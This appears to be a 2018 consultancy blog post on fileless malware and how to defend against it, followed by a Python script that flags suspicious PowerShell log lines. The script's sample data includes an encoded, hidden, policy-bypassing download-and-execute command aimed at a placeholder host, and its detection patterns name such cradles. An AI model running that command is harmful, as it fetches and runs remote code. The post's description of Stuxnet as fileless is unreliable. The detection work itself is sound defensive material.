From Del Brazil, Senior Security Consultant – Advent IM
Simply put, fileless malware is a well-engineered piece of malware that is very difficult to detect as part of any post-incident analysis. It is designed to operate and survive in the memory of a system, so once the system is rebooted the malware should, or at least could, be removed. That sounds easy to defeat, or so you’d think, as normally rebooting a system would remove the malware; however, there are now versions that write an entry into the system’s registry, making the malware more persistent.
As with all computer software and hardware, there are always unknown vulnerabilities waiting to be exploited by attackers. The trick is finding the vulnerabilities before the attacker does and suitably addressing them to prevent an attack; however, more often than not a vulnerability is only discovered after an attack has taken place, and it then becomes a race to identify a solution and make it available to legitimate users before attackers conduct multiple attacks on the various systems used by everyone and anyone.
A prime example of a fileless malware attack would be the one carried out on the Iranian nuclear facility by Stuxnet. The attack was directed at Microsoft Windows machines running specific software, and once a certain set of parameters/measurements was met the malware would unload its payload, causing damage to the systems using Microsoft Windows.
Because no file is stored on the target machine/system, any forensic examination has to be carried out in a particular manner to ensure that potential evidence is correctly retained, since following the standard guidelines may erase, or at least make it very difficult to recover, any useful evidential material.
For this reason alone, fileless malware is very attractive to would-be attackers, as it can leave little if any trace for standard digital investigative practices.
Attackers can develop malware that operates within PowerShell scripts, where it can execute hidden commands that may render the target machine/system defenceless or even allow unauthorised access to sensitive data.
So the big question is, how do we defeat fileless malware? There is no simple answer, but as usual we go back to some basic principles: systems (hardware and software) need to be updated and maintained in line with the manufacturer’s requirements. This will not in any way guarantee to defeat a fileless malware attack, as generally speaking fileless attacks exploit as yet undiscovered or undisclosed vulnerabilities; however, educating users not to download, install, update or import files, software, images or any other form of file may reduce the likelihood of a piece of fileless malware being installed and/or executed.
Developers should also be required to use a sandbox environment to avoid a potential infection attacking a live system; this, coupled with enforcing the rule of least privilege, may reduce the possibility of an attack. Most importantly of all, ensure that the use of PowerShell or similar programs is strictly controlled and monitored for any unauthorised or unusual activity.
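One way to put that PowerShell monitoring into practice, as an added example that is not part of the original post: a small Python triage script that scans script-block log text (assumed here to be the message text of Windows event 4104 entries) for indicator patterns, decodes any -EncodedCommand argument so the hidden command becomes visible, and flags lines that trip more than one indicator. The indicator list, the threshold and the sample log lines are constructed assumptions for illustration.

```python
import base64
import re

# Indicator patterns a defender might apply to PowerShell script-block log text
# (Windows event 4104). Assumed for illustration, not an exhaustive rule set.
SUSPICIOUS = {
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "invoke_expression": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass", re.I),
    "in_memory_load": re.compile(r"Reflection\.Assembly\]::Load", re.I),
}

def decode_encoded_command(text):
    """Return the UTF-16LE payload behind -EncodedCommand, or '' if absent/undecodable."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", text, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def score_script_block(text):
    """Sorted names of indicators found in the block text plus its decoded payload."""
    haystack = text + "\n" + decode_encoded_command(text)
    return sorted(name for name, rx in SUSPICIOUS.items() if rx.search(haystack))

def triage(log_lines, threshold=2):
    """(index, indicators) for every line that trips at least `threshold` indicators."""
    hits = []
    for i, line in enumerate(log_lines):
        found = score_script_block(line)
        if len(found) >= threshold:
            hits.append((i, found))
    return hits

# Constructed sample log lines (not real telemetry). The second one carries an
# encoded command whose contents only become visible after decoding.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')".encode("utf-16-le")
).decode()
SAMPLE_LOG = [
    r"Get-ChildItem C:\Logs | Where-Object Length -gt 1MB",
    f"powershell.exe -w hidden -ep bypass -enc {ENCODED}",
    "Invoke-WebRequest https://updates.example.invalid/patch.msi -OutFile C:\\Temp\\patch.msi",
]

if __name__ == "__main__":
    for idx, found in triage(SAMPLE_LOG):
        print(f"line {idx}: {', '.join(found)}")
```

The threshold keeps a lone download cmdlet (a routine patch fetch in the third sample line) below the alerting bar while the hidden, policy-bypassing, encoded line is flagged on five indicators.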
- Posted by Ellie Hurst
- On 5th March 2018